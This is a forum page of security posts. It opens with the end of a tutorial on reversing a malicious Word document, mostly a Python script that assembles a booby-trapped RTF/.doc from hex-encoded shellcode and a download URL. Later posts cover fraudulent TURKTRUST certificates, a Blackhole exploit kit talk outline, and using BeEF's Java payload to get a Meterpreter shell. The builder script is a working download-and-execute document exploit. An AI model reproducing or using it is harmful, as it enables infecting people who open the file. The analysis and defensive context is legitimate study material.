"\x61\x39\x5C\x27\x61\x33\x5C\x27\x61\x63\x5C\x27\x61\x33\x5C\x27" "\x61\x65\x5C\x27\x61\x33\x5C\x27\x62\x61\x5C\x27\x61\x33\x5C\x27" "\x62\x62\x5C\x27\x61\x33\x5C\x27\x62\x66\x5C\x27\x61\x33\x5C\x27" "\x64\x64\x5C\x27\x61\x33\x5C\x27\x65\x30\x5C\x27\x61\x33\x5C\x27" "\x66\x63\x5C\x27\x61\x33\x5C\x27\x66\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x62\x5C\x27\x61\x31\x5C\x27\x65\x39\x0D\x0A\x7D\x7B\x5C\x2A" "\x5C\x6C\x63\x68\x61\x72\x73\x20\x28\x5B\x5C\x27\x37\x62\x5C\x27" "\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27\x61\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x30\x5C\x27\x61\x31\x5C\x27\x62\x34\x5C\x27" "\x61\x31\x5C\x27\x62\x36\x5C\x27\x61\x31\x5C\x27\x62\x38\x5C\x27" "\x61\x31\x5C\x27\x62\x61\x5C\x27\x61\x31\x5C\x27\x62\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x32\x5C\x27\x61\x31\x5C\x27\x62\x63\x5C\x27" "\x61\x33\x5C\x27\x61\x38\x5C\x27\x61\x33\x5C\x27\x61\x65\x5C\x27" "\x61\x33\x5C\x27\x64\x62\x5C\x27\x61\x33\x5C\x27\x66\x62\x5C\x27" "\x61\x31\x5C\x27\x65\x61\x5C\x27\x61\x33\x5C\x27\x61\x34\x7D\x5C" "\x66\x65\x74\x30\x7B\x5C\x2A\x5C\x77\x67\x72\x66\x66\x6D\x74\x66" "\x69\x6C\x74\x65\x72\x20\x30\x31\x33\x66\x7D\x5C\x69\x6C\x66\x6F" "\x6D\x61\x63\x61\x74\x63\x6C\x6E\x75\x70\x30\x5C\x6C\x74\x72\x70" "\x61\x72\x20\x5C\x73\x65\x63\x74\x64\x20\x5C\x6C\x74\x72\x73\x65" "\x63\x74\x0D\x0A\x5C\x6C\x69\x6E\x65\x78\x30\x5C\x68\x65\x61\x64" "\x65\x72\x79\x38\x35\x31\x5C\x66\x6F\x6F\x74\x65\x72\x79\x39\x39" "\x32\x5C\x63\x6F\x6C\x73\x78\x34\x32\x35\x5C\x65\x6E\x64\x6E\x68" "\x65\x72\x65\x5C\x73\x65\x63\x74\x6C\x69\x6E\x65\x67\x72\x69\x64" "\x33\x31\x32\x5C\x73\x65\x63\x74\x73\x70\x65\x63\x69\x66\x79\x6C" "\x5C\x73\x66\x74\x6E\x62\x6A\x20\x7B\x5C\x2A\x5C\x70\x6E\x73\x65" "\x63\x6C\x76\x6C\x31\x5C\x70\x6E\x75\x63\x72\x6D\x5C\x70\x6E\x73" "\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32" "\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74" "\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70" "\x6E\x73\x65\x63\x6C\x76\x6C\x32\x5C\x70\x6E\x75\x63\x6C\x74\x72" "\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65" "\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70" "\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B" "\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x33\x0D\x0A\x5C\x70" "\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E" "\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67" "\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20" "\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x34" "\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61\x72\x74" "\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E" "\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64" "\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63" "\x6C\x76\x6C\x35\x5C\x70\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x36\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C" "\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E" "\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C" "\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B" "\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D" "\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x37\x5C\x70" "\x6E\x6C\x63\x72\x6D\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70" "\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E" "\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68" "\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63" "\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76" "\x6C\x38\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x39\x5C\x70\x6E\x6C\x63\x72\x6D\x5C\x70" "\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74" "\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C\x70" "\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C" "\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D" "\x5C\x70\x61\x72\x64\x5C\x70\x6C\x61\x69\x6E\x20\x5C\x6C\x74\x72" "\x70\x61\x72\x5C\x71\x6A\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C" "\x6E\x6F\x77\x69\x64\x63\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70" "\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61" "\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61" "\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C" "\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63" "\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32" "\x34\x5C\x61\x6C\x61\x6E\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72" "\x63\x68\x5C\x66\x63\x73\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C" "\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32" "\x30\x35\x32\x5C\x6B\x65\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63" "\x68\x5C\x61\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x32\x30\x35\x32\x20\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66" "\x63\x73\x31\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C" "\x66\x63\x73\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38" "\x30\x37\x35\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C" "\x64\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x5C\x66" "\x30\x20\x46\x7D\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38\x30\x37\x35" "\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63" "\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x7D\x7B\x5C\x73\x68" "\x70\x7B\x5C\x73\x70\x7B\x5C\x73\x6E\x31\x09\x70\x66\x52\x61\x47" "\x4D\x65\x4E\x54\x73\x7D\x7B\x5C\x73\x76\x20\x31\x3B\x31\x3B\x30" "\x31\x31\x31\x31\x31\x31\x31\x66\x66\x30\x33\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x32\x66\x39\x30\x39\x33\x37\x38\x30\x30\x30\x30\x38" "\x30\x37\x63\x30\x30\x30\x30\x38\x30\x37\x63\x42\x42\x42\x42\x42" "\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44" "\x44\x44\x44\x39\x30\x39\x30\x65\x62\x37\x31\x33\x31\x63\x39\x36" "\x34\x38\x62\x37\x31\x33\x30\x38\x62\x37\x36\x30\x63\x38\x62\x37" "\x36\x31\x63\x38\x62\x35\x65\x30\x38\x38\x62\x37\x65\x32\x30\x38" "\x62\x33\x36\x36\x36\x33\x39\x34\x66\x31\x38\x37\x35\x66\x32\x63" "\x33\x36\x30\x38\x62\x36\x63\x32\x34\x32\x34\x38\x62\x34\x35\x33" "\x63\x38\x62\x35\x34\x32\x38\x37\x38\x30\x31\x65\x61\x38\x62\x34" "\x61\x31\x38\x38\x62\x35\x61\x32\x30\x30\x31\x65\x62\x65\x33\x33" "\x34\x34\x39\x38\x62\x33\x34\x38\x62\x30\x31\x65\x65\x33\x31\x66" "\x66\x33\x31\x63\x30\x66\x63\x61\x63\x38\x34\x63\x30\x37\x34\x30" "\x37\x63\x31\x63\x66\x30\x64\x30\x31\x63\x37\x65\x62\x66\x34\x33" "\x62\x37\x63\x32\x34\x32\x38\x37\x35\x65\x31\x38\x62\x35\x61\x32" "\x34\x30\x31\x65\x62\x36\x36\x38\x62\x30\x63\x34\x62\x38\x62\x35" "\x61\x31\x63\x30\x31\x65\x62\x38\x62\x30\x34\x38\x62\x30\x31\x65" "\x38\x38\x39\x34\x34\x32\x34\x31\x63\x36\x31\x63\x33\x65\x38\x39" "\x32\x66\x66\x66\x66\x66\x66\x35\x64\x65\x62\x30\x35\x65\x38\x66" "\x33\x66\x66\x66\x66\x66\x66\x38\x39\x65\x66\x38\x33\x65\x66\x38" "\x39\x38\x39\x65\x65\x38\x33\x65\x65\x39\x35\x38\x31\x65\x64\x34" "\x35\x66\x66\x66\x66\x66\x66\x36\x38\x33\x33\x63\x61\x38\x61\x35" "\x62\x35\x33\x65\x38\x38\x61\x66\x66\x66\x66\x66\x66\x35\x35\x36" "\x61\x36\x34\x66\x66\x64\x30\x35\x37\x38\x39\x63\x37\x30\x31\x65" "\x66\x61\x34\x38\x30\x37\x66\x66\x66\x30\x30\x37\x35\x66\x39\x35" "\x66\x36\x38\x38\x65\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x36" "\x64\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36" "\x66\x36\x65\x35\x31\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35" "\x34\x66\x66\x64\x30\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35" "\x30\x65\x38\x35\x33\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35" "\x31\x35\x31\x35\x35\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38\x39" "\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x33\x66\x66\x66\x66" "\x66\x66\x66\x34\x31\x35\x31\x35\x35\x66\x66\x64\x30\x37\x33\x37" "\x36\x36\x33\x36\x38\x36\x66\x37\x33\x37\x34\x32\x65\x36\x35\x37" "\x38\x36\x35\x30\x30") footer =("\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x7D\x7D\x7D\x7D" ) url="" ul = open("URL.txt",'rb') sr = ul.read() for i in range(0,len(sr)): a = ord(sr[i]) url += "%02x" % a url +="\x30"*2 payload = header + url + footer file = open("Laden.doc",'wb') file.write(header + url + footer) file.close() os.rename("Laden.doc",st) URL.txt contains the actual URL from where one has to download calc. This URL.txt file should be in the same folder where the creator file will be. You can also embed the direct text string of the URL in the creator file. One more point: reversing the exploit sample will vary from exploit to exploit. It’s not that while reversing another sample you will always apply the same process, but in 80% of the cases, it’s what I explain above. Sursa: InfoSec Institute Resources – Reversing a Malicious Word Document
  22. Nytro

    Hacker Database

    Nytro posted a topic in Linkuri

    [h=2]Hacker Database[/h]Browse the World's Largest Public Hacker Database Link: http://www.soldierx.com/hdb Haters gonna hate : TinKode, sysgh0st | SOLDIERX.COM
  23. Nytro
    [h=1]TURKTRUST CA Problems[/h] Kurt Baumgartner Kaspersky Lab Expert Posted January 03, 21:04 GMT Microsoft just publicly announced a release to actively "untrust" three certificates issued by Certificate Authority TURKTRUST and its Intermediate CAs, a subsidiary of the Turkish Armed Forces ELELE Foundation Company. According to Microsoft, the company made a couple major mistakes resulting in fraudulent certificate issuance that could be used to MiTM encrypted communications or spoof gmail and a long list of other google properties. A Chrome installation detected a "an unauthorized digital certificate for the "*.google.com" domain" late the night of Dec. 24th 2012, and the Google security team's investigation began there. TURKTRUST's mistakes included issuing two certificates incorrectly. They created digital certificates for *.EGO.GOV.TR and e-islem.kktcmerkezbankasi.org. Both of these certs lacked CRL or OCSP extensions and were incorrectly issued as end-entity certs. These mistakes enabled the *.EGO.GOV.TR authority to be misused and fraudulently issue a certificate for *.google.com. Microsoft is not only issuing fixes for this CA trust problem, but including known CA fixes in the recent past. This list of Google properties are fixed by the release: *.google.com *.android.com *.appengine.google.com *.cloud.google.com *.google-analytics.com *.google.ca *.google.cl *.google.co.in *.google.co.jp *.google.co.uk *.google.com.ar *.google.com.au *.google.com.br *.google.com.co *.google.com.mx *.google.com.tr *.google.com.vn *.google.de *.google.es *.google.fr *.google.hu *.google.it *.google.nl *.google.pl *.google.pt *.googleapis.cn *.googlecommerce.com *.gstatic.com *.urchin.com *.url.google.com *.yo utube-nocookie.com *.youtube.com *.ytimg.com android.com g.co goo.gl google-analytics.com google.com googlecommerce.com urchin.com youtu.be youtube.com The release may cause some confusion. The vendors are handling the incident differently - the three certificates that are being "untrusted" by Microsoft do not include the TURKTRUST Trusted Root CA certificate itself. But the certificates for the two intermediate authorities are effected, as is the fraudulent Google property certificate. Also adding to the confusion is the fact that some systems seem to have TURKTRUST certificates included as a Trusted Root Certificate Authority on their Windows system, but others do not. This inclusion has to do with the ways in which Microsoft updates their root certificate stores on newer systems vs. older Windows OS systems. Microsoft provides a knowledge base article that presents all of the gory details on Microsoft Root Certificate updates. Just follow the link and go to the section "How Windows Updates Root Certificates", where you will find information on both Windows Vista and Windows 7, on Windows XP and its manual update root package, and on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2 OS systems. To sum it up, most users that do not visit web sites in the Middle East, especially Turkey and Cyprus, will not have the TURKTRUST Trusted Root CA certificate installed on their system (although Google did not disclose the location of the detected fraudulent certificate). So, for the most part, this release does not directly effect their system. Also, most helpful here is the automatic updater of revoked certificates released by Microsoft back in June, available for Windows Vista Service Pack 2, Windows Server 2008 Service Pack 2, Windows 7, and Windows Server 2008 R2. Both Mozilla and Google posted information about the problem. Google pushed Chrome’s certificate revocation metadata on December 24th and 25th to block both of the Intermediate Certificate Authority certificates. An ongoing discussion exists over at the mozilla.dev.security.policy group. It appears that Mozilla is the only vendor of the three to altogether suspend trust in the TURKTRUST root CA cert: "We have also suspended inclusion of the “TÜRKTRUST Bilgi Ýletiþim ve Biliþim Güvenliði Hizmetleri A.Þ. © Aralýk 2007” root certificate, pending further review". Please see the long list of links at the right side of the page for more information from the vendors and posts on past CA issues. Sursa: TURKTRUST CA Problems - Securelist
  24. Nytro
    Analytical Summary Of The Blackhole Exploit Kit Description: ANALYTICAL SUMMARY OF THE BLACKHOLE EXPLOIT KIT Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy to follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible Javascript, PHP, or x86 Assembly. A. What a browser exploit kit is, and what it isn't It only does exploits Directing victims to the exploits is out of scope Usually done with spam or iframe injections The actual malware installed is out of scope too Where is exploit kit is hosted, is also quite variable B. Timeline Version 1.0.0 - September 2010 i. It's not that different from other exploit kits Version 1.0.1 Version 1.0.2 - November 2010 i. Changelog ii. Leaked in May 2011 Version 1.1.0 - December 2010 i. Changelog Version 1.2.0 - August 2011 i. Changelog Version 1.2.1 - December 2011 Version 1.2.2 i. Cryptome "Virus" Version 1.2.3 - March 2012 Version 1.2.4 - June 2012 i. CVE-2012-1723 ii. CVE-2011-2110 Version 1.2.5 - July 2012 i. CVE-2012-1889 ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm' August 2012 i. CVE-2012-4681 Version 2.0.0 - September 2012 i. Changelog ii. The official announcement isn't entirely true. C. The "Free Version" Pulled from a system with C99 Shell IonCube "copy protection" How to break IonCube obfuscation Analysis of PHP Source Code D. Open Source Code in use PluginDetect MaxMind GeoIP etc. E. The Exploits CVE-2010-0188 etc. etc. etc. as time allows X. There is almost no change in the expliots themselves from one version of the exploit kit to the next. Y. Currious clues about the possible authorship of some exploits Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Analytical Summary Of The Blackhole Exploit Kit
  25. Nytro
    Beef - Java Payload Exploitation Description: In this video I will show you how to exploit a system using BeEF Browser Exploitation Framework and Java Payload Module. In BeEF Framework there is one module available called Java Payload in local exploits we are going to use that module and exploiting the windows -7 system. So, first you need to hook the browser and use that module victim will get the Java Pop-up if he click on OK you will get the meterpreter shell in some time Note for getting session it will take some time so be patient. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef - Java Payload Exploitation
×
×
  • Create New...